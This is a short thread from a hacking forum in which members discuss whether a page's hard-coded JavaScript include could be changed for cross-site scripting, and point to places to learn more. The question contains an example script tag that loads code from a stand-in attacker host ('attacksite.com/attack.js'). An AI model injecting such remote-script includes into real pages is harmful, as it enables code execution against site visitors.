HellBound Hackers
Join us at IRC!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Thursday, May 24, 2012
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
HellBoundHackers Additional:
Shop
Learn
Communicate
Submit
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Interact
Other
HellBoundHackers Executive:
HellBoundHackers Leisure:
Members Online
Total Online: 28
Web Spiders: 14
Guests Online: 26
Members Online: 2
AldarHawk, Electric

Registered Members: 70196
Newest Member: Cruze
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general
Author

Javascript XSS vulnerability?
leoneo11
Member



Posts: 6
Location:
Joined: 05.03.08
Rank: Monster
Posted on 12-09-08 22:48
Just a thought I had, But I'm not too good with Javascblockedript or Javascblockedript vulnerabilities but I know the basics pretty well. Anyway theoretically lets say there is a web page that executes a scblockedript when the web page loads in a separate directory on the server. So that the HTML code would look like this:

src="file:///C:/Javascblockedripts/Myscblockedript.js">


To me... This just seems very vulnerable to a XSS attack if you can change the src example:

src="http://www.attacksite.com/attack.js">


But to my knowledge the javascblockedript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the the path to the scblockedript or am I safe?
Author

RE: Javascript XSS vulnerability?
spyware
Member



Posts: 4190
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 90
Posted on 12-09-08 22:49
You can't change the hard-coded (no variable) settings. Oh, and you're not safe.

Edit: Actually, you can change hard-coded settings if you can regex+replace with some XSS.

Anyway, stop asking and start learning. I advise ha.ckers.org and sla.ckers.org if you want to learn about XSS, and Webappsec in general.



"The chowner of property." - Zeph
“Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.” - Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert


Edited by spyware on 12-09-08 23:25
http://bitsofspy.net
Author

RE: Javascript XSS vulnerability?
Zephyr_Pure
Member



Posts: 2402
Location:
Joined: 15.09.06
Rank: God
Posted on 13-09-08 00:53
leoneo11 wrote:
But to my knowledge the javascblockedript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the the path to the scblockedript or am I safe?


Both the Javascblockedript and the Javascblockedript include can be changed if you're rendering the page in something that lets you modify the source in place (PHP cURL, C# w/ MSHTML, even Opera should). I used to do this with MSHTML and my last workplace's CMS to automate the page while eliminating those pesky JS pop-ups. HTML and Javascblockedript are both client-side once they're rendered... which is why GreaseMonkey even works.

I still check PMs from time to time.




Our responses were moronic, why shouldn't he follow suit? - Futility
Author

RE: Javascript XSS vulnerability?
Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank: God
Posted on 13-09-08 08:30
leoneo11 wrote:
Anyway theoretically lets say there is a web page that executes a scblockedript when the web page loads in a separate directory on the server. So that the HTML code would look like this:

src="file:///C:/Javascblockedripts/Myscblockedript.js">

I'd say this wouldn't work, since the javascblockedript is executed on the client's computer and not on the server. It'd rather look like this:
<scblockedript src="Javascblockedripts/Myscblockedript.js">


To me... This just seems very vulnerable to a XSS attack if you can change the src example:

src="http://www.attacksite.com/attack.js">

I understand what you mean, but you can't simply edit a hard coded HTML file just like that. Like spyware said, practical experience is very good. Get training ;)

http://www.xssed.com/


http://uber0n.webs.com/
Nope http://uber0n.webs.com/
Guest
Username

Password

Remember Me


Bookmark This Page
Affiliates
Adverts

 

 

Links

Anime Wallpaper Site
By using, viewing or obtaining any information contained on this site, you agree to the disclaimer.

© HellBound Hackers 2008- 2009. Since 3rd December 2004.

20610071 Unique Visits

Powered by HBH-Fusion